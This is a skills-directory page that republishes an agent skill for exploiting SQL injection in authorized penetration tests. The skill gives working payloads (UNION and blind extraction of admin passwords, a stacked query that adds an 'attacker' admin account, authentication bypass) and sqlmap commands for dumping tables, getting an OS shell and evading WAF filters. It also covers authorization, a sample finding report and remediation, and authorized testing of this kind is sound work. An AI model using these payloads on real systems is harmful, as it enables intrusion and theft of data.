Agent skill

Exploiting SQL Injection Vulnerabilities

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap.

Apache-2.0Auto-check passedSecurity

Install Exploiting SQL Injection Vulnerabilities

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-sql-injection-vulnerabilities -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-sql-injection-vulnerabilities --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploiting-sql-injection-vulnerabilities .claude/skills/exploiting-sql-injection-vulnerabilities && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
exploiting-sql-injection-vulnerabilities
GitHub stars
34k
Token cost
~3.2k tokens
SKILL.md length
1,217 words
Files
4 (incl. scripts, references)
Skills in repo
639
Repo updated
First seen
Licence
Apache-2.0

At a glance

Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap.

  • Works in 5 steps: Injection Point Discovery → Database Fingerprinting → Manual Exploitation Techniques → …
  • Tasks that involve Web application vulnerabilities
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder

What it does

Exploiting SQL Injection Vulnerabilities is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap. The tester detects injection points through error-based, union-based, blind boolean, and time-based blind techniques across all major database engines (MySQL, PostgreSQL, MSSQL, Oracle) to demonstrate data extraction, authentication bypass, and potential remote code execution. Activates for requests involving SQL injection testing, SQLi…

Its SKILL.md is about 3.2k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Security, covering Web application vulnerabilities and Penetration testing. It works with Microsoft SQL Server, MySQL, PostgreSQL and SQL. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Tasks that involve Web application vulnerabilities
  • Tasks that involve Penetration testing

Example prompts

  • “Use the exploiting-sql-injection-vulnerabilities skill to identify and exploits SQL injection vulnerabilities in web applications during authorized…”
  • “/exploiting-sql-injection-vulnerabilities”

Requirements

  • Python 3

Workflow steps

5 steps, taken from the step headings in SKILL.md.

  1. Injection Point Discovery
  2. Database Fingerprinting
  3. Manual Exploitation Techniques
  4. Automated Exploitation with sqlmap
  5. Impact Demonstration and Reporting

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Exploiting SQL Injection Vulnerabilities loads about 3.2k tokens when it runs, and up to ~3.6k if it reads all its reference files. Until then it costs about 158 tokens; SKILL.md has 1,217 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~158
When it runs · the whole SKILL.md, loaded when a task matches
~3.2k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 1,217 words, ~3,172 tokens.

Download SKILL.mdSave it as .claude/skills/exploiting-sql-injection-vulnerabilities/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
exploiting-sql-injection-vulnerabilities
description
Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap. The tester detects injection points through error-based, union-based, blind boolean, and time-based blind techniques across all major database engines (MySQL, PostgreSQL, MSSQL, Oracle) to demonstrate data extraction, authentication bypass, and potential remote code execution. Activates for requests involving SQL injection testing, SQLi exploitation, database security assessment, or injection vulnerability verification.
domain
cybersecurity
subdomain
penetration-testing
tags
SQL-injection, sqlmap, database-security, OWASP-A03, injection-testing
version
1.0.0
author
mahipal
license
Apache-2.0
nist_csf
ID.RA-01, ID.RA-06, GV.OV-02, DE.AE-07
mitre_attack
T1595, T1190, T1059, T1078, T1055

Exploiting SQL Injection Vulnerabilities

When to Use

  • Testing web application input parameters for SQL injection vulnerabilities during an authorized penetration test
  • Validating that parameterized queries and input sanitization are properly implemented across all database interactions
  • Demonstrating the business impact of a confirmed SQL injection vulnerability by extracting sensitive data
  • Verifying that WAF rules and input validation controls effectively block SQL injection payloads
  • Testing stored procedures, dynamic SQL, and ORM bypass scenarios in enterprise applications

Do not use against databases without written authorization, for extracting or exfiltrating actual customer data beyond what is needed for proof of concept, or against production databases where exploitation could corrupt data integrity.

Prerequisites

  • Written authorization specifying the target application and permissible level of exploitation (detection only vs. full exploitation)
  • Burp Suite Professional configured as an intercepting proxy to capture and modify HTTP requests
  • sqlmap installed with current version for automated detection and exploitation
  • Knowledge of the target database engine (MySQL, PostgreSQL, MSSQL, Oracle) or ability to fingerprint it
  • Test accounts at various privilege levels to test injection in authenticated contexts

Workflow

Step 1: Injection Point Discovery

Identify parameters that interact with the database:

  • Map all input vectors: Catalog every parameter in URLs (GET), request bodies (POST), HTTP headers (Cookie, Referer, User-Agent, X-Forwarded-For), and JSON/XML API payloads
  • Error-based detection: Inject a single quote (') into each parameter and observe the response. SQL errors (e.g., "You have an error in your SQL syntax", "unterminated quoted string", "ORA-01756") confirm the parameter reaches the database unsanitized.
  • Boolean-based detection: Inject ' AND 1=1-- (true condition) and ' AND 1=2-- (false condition). If the responses differ (different content length, different data returned, different HTTP status), the parameter is injectable.
  • Time-based detection: Inject '; WAITFOR DELAY '0:0:5'-- (MSSQL), ' AND SLEEP(5)-- (MySQL), or '; SELECT pg_sleep(5)-- (PostgreSQL). A 5-second response delay confirms injection.
  • Out-of-band detection: Use payloads that trigger DNS or HTTP requests to a Burp Collaborator domain to confirm injection in scenarios where responses are not directly observable.
  • Second-order injection: Test for injection where input is stored and later used in a different SQL query (e.g., username stored at registration, used in a query on the profile page).
Step 2: Database Fingerprinting

Determine the database engine and version to select appropriate exploitation techniques:

  • Error-based fingerprinting: Each database produces distinctive error messages. MySQL includes "MySQL", MSSQL mentions "SQL Server", PostgreSQL references "PG", Oracle contains "ORA-".
  • Function-based fingerprinting: Inject database-specific functions:
    • MySQL: ' AND VERSION()-- or ' AND @@version--
    • MSSQL: ' AND @@version-- or ' AND DB_NAME()--
    • PostgreSQL: ' AND version()--
    • Oracle: ' AND banner FROM v$version--
  • String concatenation differences: MySQL uses CONCAT('a','b') or 'a' 'b', MSSQL uses 'a'+'b', PostgreSQL uses 'a'||'b', Oracle uses 'a'||'b'
  • Comment syntax: MySQL supports # and -- , MSSQL uses -- , PostgreSQL uses -- , Oracle uses --
Step 3: Manual Exploitation Techniques

Exploit confirmed injection points using technique-appropriate methods:

  • UNION-based extraction: Determine the number of columns with ORDER BY incrementing (' ORDER BY 1--, ' ORDER BY 2--, etc. until an error occurs). Then construct UNION SELECT to extract data:
    ' UNION SELECT NULL,username,password,NULL FROM users--
  • Error-based extraction (MySQL): Use EXTRACTVALUE or UPDATEXML to force data into error messages:
    ' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version),0x7e))--
  • Blind boolean extraction: Extract data one character at a time by testing character values:
    ' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
  • Time-based blind extraction: Same character-by-character approach using time delays:
    ' AND IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a',SLEEP(5),0)--
  • Stacked queries (where supported): Execute additional SQL statements:
    '; INSERT INTO users(username,password,role) VALUES('attacker','password','admin')--
Step 4: Automated Exploitation with sqlmap

Use sqlmap for efficient exploitation of confirmed injection points:

  • Basic detection: sqlmap -u "https://target.com/page?id=1" --batch --random-agent to detect injection and identify the database
  • Extract databases: sqlmap -u "https://target.com/page?id=1" --dbs to list all databases
  • Extract tables: sqlmap -u "https://target.com/page?id=1" -D <database> --tables to list tables
  • Extract data: sqlmap -u "https://target.com/page?id=1" -D <database> -T users --dump --threads 5 to extract table contents
  • POST parameters: sqlmap -u "https://target.com/login" --data="username=test&password=test" -p username to test POST parameters
  • Cookie injection: sqlmap -u "https://target.com/page" --cookie="session=abc123; id=1*" --level 2 to test cookie parameters (mark injectable parameter with *)
  • OS command execution (if DB user has sufficient privileges): sqlmap -u "https://target.com/page?id=1" --os-shell to attempt command execution via xp_cmdshell (MSSQL) or INTO OUTFILE (MySQL)
  • Tamper scripts: sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between to bypass WAF filters
Step 5: Impact Demonstration and Reporting

Document the full impact of the SQL injection vulnerability:

  • Data extraction evidence: Capture screenshots or sqlmap output showing extracted database names, table schemas, and sample records (redact actual PII in the report)
  • Authentication bypass: Demonstrate login bypass with admin' OR 1=1-- and document the bypassed authentication mechanism
  • Privilege escalation: If the database user has DBA privileges, document what additional capabilities are available (file read/write, command execution)
  • Lateral movement potential: Document if the database server has network access to other internal systems that could be reached through OS-level access gained via SQLi
  • Remediation: Provide specific code-level fixes showing the vulnerable query and the corrected parameterized version
Show full SKILL.md (451 more words)Show less

Key Concepts

TermDefinition
SQL InjectionA code injection technique that exploits unvalidated user input in SQL queries to manipulate database operations, extract data, or execute administrative operations
Union-Based SQLiInjection technique that appends a UNION SELECT statement to the original query to extract data from other tables in the same response
Blind SQL InjectionInjection where the application does not return query results directly; the attacker infers data through boolean responses or time delays
Parameterized QueryA prepared SQL statement where user input is passed as parameters rather than concatenated into the query string, preventing injection
Second-Order InjectionSQL injection where the malicious payload is stored by the application and executed in a different context or SQL query at a later time
Stacked QueriesExecuting multiple SQL statements separated by semicolons in a single request, enabling INSERT, UPDATE, or DELETE operations through injection
WAF BypassTechniques for evading Web Application Firewall rules that block common SQL injection patterns, using encoding, alternate syntax, or fragmentation

Tools & Systems

  • sqlmap: Automated SQL injection detection and exploitation tool supporting 6 injection techniques across 30+ database management systems
  • Burp Suite Professional: HTTP proxy for intercepting, modifying, and replaying requests with SQL injection payloads across all parameter types
  • Havij: GUI-based SQL injection tool used for rapid automated exploitation when sqlmap is not available
  • jSQL Injection: Java-based SQL injection tool with GUI supporting automatic injection, database extraction, and file read/write

Common Scenarios

Scenario: SQL Injection in Healthcare Patient Portal

Context: A healthcare organization's patient portal allows patients to view their medical records, appointments, and billing information. The application uses a PHP backend with MySQL database. The tester has a valid patient account.

Approach:

  1. Map all parameters in the patient portal; identify that the appointment detail page uses /appointment?id=4521
  2. Inject a single quote into the id parameter; receive a MySQL error confirming the parameter is injectable
  3. Use ORDER BY to determine the query returns 7 columns
  4. Construct UNION SELECT to extract table names from information_schema, discovering tables: patients, medical_records, billing, admin_users
  5. Extract admin_users table to reveal 5 administrator accounts with MD5-hashed passwords
  6. Demonstrate that patient medical records for all patients are accessible by querying the medical_records table through the injection point
  7. Document that 15,000+ patient records containing PHI (protected health information) are accessible, constituting a HIPAA violation

Pitfalls:

  • Running sqlmap with default settings against a production database and causing excessive load or data corruption
  • Extracting and storing actual patient data during the assessment rather than limiting proof to record counts and schema
  • Not testing for second-order injection in stored procedures called by the application
  • Failing to test all parameter types (cookies, headers, JSON body) and only testing URL parameters

Output Format

## Finding: SQL Injection in Appointment Detail Parameter

**ID**: SQLI-001
**Severity**: Critical (CVSS 9.8)
**Affected URL**: GET /appointment?id=4521
**Parameter**: id (GET parameter)
**Database**: MySQL 8.0.32
**Injection Type**: Error-based, UNION-based

**Description**:
The appointment detail page concatenates the 'id' URL parameter directly into
a SQL query without parameterization or input validation. This allows an attacker
to inject arbitrary SQL statements and extract data from any table in the database.

**Proof of Concept**:
Request: GET /appointment?id=4521' UNION SELECT 1,username,password,4,5,6,7 FROM admin_users-- -
Response: Returns admin usernames and MD5 password hashes in the page content.

**Data Accessible**:
- patients table: 15,247 records (name, DOB, SSN, address, phone)
- medical_records table: 43,891 records (diagnoses, prescriptions, lab results)
- admin_users table: 5 accounts with MD5-hashed passwords
- billing table: 28,563 records (insurance details, payment information)

**Remediation**:
1. Replace string concatenation with parameterized queries:
   VULNERABLE:  $query = "SELECT * FROM appointments WHERE id = " . $_GET['id'];
   SECURE:      $stmt = $pdo->prepare("SELECT * FROM appointments WHERE id = ?");
                $stmt->execute([$_GET['id']]);
2. Implement input validation to reject non-integer values for the id parameter
3. Apply least-privilege database permissions (read-only for the web application user)
4. Deploy a WAF rule to detect and block SQL injection patterns as defense-in-depth

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/exploiting-sql-injection-vulnerabilities of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Exploiting SQL Injection Vulnerabilities next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Exploiting SQL Injection Vulnerabilities compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Exploiting SQL Injection Vulnerabilities this skillmukul975/Anthropic-Cybersecurity-Skills34k—~3.2kAutomated safety check: PassApache-2.0
Web Sqlis0ld13rr/pentestcode817—~710Automated safety check: PassMIT
SQL Code Reviewgithub/awesome-copilot40k1 repos~2.2kAutomated safety check: PassMIT
Sqli TestingNeoTheCapt/RedteamAgent140—~1.2kAutomated safety check: PassNone
SQL Code Reviewtotvs/engpro-advpl-tlpp-skills141—~3.5kAutomated safety check: PassMIT
Database Migrations SQL Migrationsrmyndharis/antigravity-skills1.7k2 repos~577Automated safety check: NotesMIT

Similar skills

  • Web Sqli

    s0ld13rr/pentestcode

    SQL injection detection→exploitation→proof for web apps and APIs.

    817 GitHub stars~710 tokensUpdated 5 days ago
    SecurityAuto-check passed
  • SQL Code Review

    github/awesome-copilot

    Official

    Universal SQL code review assistant that performs comprehensive security, maintainability, and code quality analysis across all SQL databases (MySQL, PostgreSQL, SQL Server, Oracle).

    40k GitHub starsUsed in 1 repo~2.2k tokens
    DatabasesAuto-check passed
  • Sqli Testing

    NeoTheCapt/RedteamAgent

    Detect and exploit SQL injection vulnerabilities in web application parameters

    140 GitHub stars~1.2k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • SQL Code Review

    totvs/engpro-advpl-tlpp-skills

    Universal SQL code review assistant that performs comprehensive security, maintainability, and code quality analysis across SQL databases (PostgreSQL, SQL Server, Oracle).

    141 GitHub stars~3.5k tokensUpdated yesterday
    DatabasesAuto-check passed
  • Database Migrations SQL Migrations

    rmyndharis/antigravity-skills

    SQL database migrations with zero-downtime strategies for PostgreSQL, MySQL, SQL Server

    1.7k GitHub starsUsed in 2 repos~577 tokens
    DatabasesAuto-check: notes
  • SQL Pro

    Jeffallan/claude-skills

    Optimizes SQL queries and designs schemas using CTEs, window functions, covering indexes and EXPLAIN ANALYZE, with notes on dialect differences between major databases.

    12k GitHub stars~1.3k tokensUpdated 3 days ago
    DatabasesAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 639 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Exploiting SQL Injection Vulnerabilities

What does Exploiting SQL Injection Vulnerabilities do?

Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap. Exploiting SQL Injection Vulnerabilities is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Identifies and exploits SQL injection vulnerabilities in web applications during authorized penetration tests using manual techniques and automated tools like sqlmap.

When should I use Exploiting SQL Injection Vulnerabilities?

Exploiting SQL Injection Vulnerabilities fits situations like: tasks that involve Web application vulnerabilities; tasks that involve Penetration testing.

How do I install Exploiting SQL Injection Vulnerabilities in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-sql-injection-vulnerabilities -a claude-code`. Or copy the skill folder (skills/exploiting-sql-injection-vulnerabilities in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/exploiting-sql-injection-vulnerabilities in your project. Claude Code loads it when a task matches its description.

How do I install Exploiting SQL Injection Vulnerabilities in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-sql-injection-vulnerabilities -a codex`. Or copy the skill folder (skills/exploiting-sql-injection-vulnerabilities in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/exploiting-sql-injection-vulnerabilities in your project. Codex loads it when a task matches its description.

Can I use Exploiting SQL Injection Vulnerabilities in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-sql-injection-vulnerabilities -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-sql-injection-vulnerabilities, .gemini/skills/exploiting-sql-injection-vulnerabilities, .github/skills/exploiting-sql-injection-vulnerabilities and .opencode/skills/exploiting-sql-injection-vulnerabilities in your project.

What does Exploiting SQL Injection Vulnerabilities need to run?

Going by SKILL.md and its folder, Exploiting SQL Injection Vulnerabilities needs Python for the scripts in its folder. Our summary lists: Python 3.

Does Exploiting SQL Injection Vulnerabilities access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Exploiting SQL Injection Vulnerabilities safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Exploiting SQL Injection Vulnerabilities use?

Exploiting SQL Injection Vulnerabilities is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Exploiting SQL Injection Vulnerabilities use?

About 3.2k tokens (SKILL.md is roughly 13k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 476 tokens, read only when the agent opens those files.

What are the alternatives to Exploiting SQL Injection Vulnerabilities?

Skills that share tags, products or a category with Exploiting SQL Injection Vulnerabilities: Web Sqli (s0ld13rr/pentestcode, 817 stars), SQL Code Review (github/awesome-copilot, 40k stars), Sqli Testing (NeoTheCapt/RedteamAgent, 140 stars) and SQL Code Review (totvs/engpro-advpl-tlpp-skills, 141 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Exploiting SQL Injection Vulnerabilities?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,870 GitHub stars. The repository holds 639 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.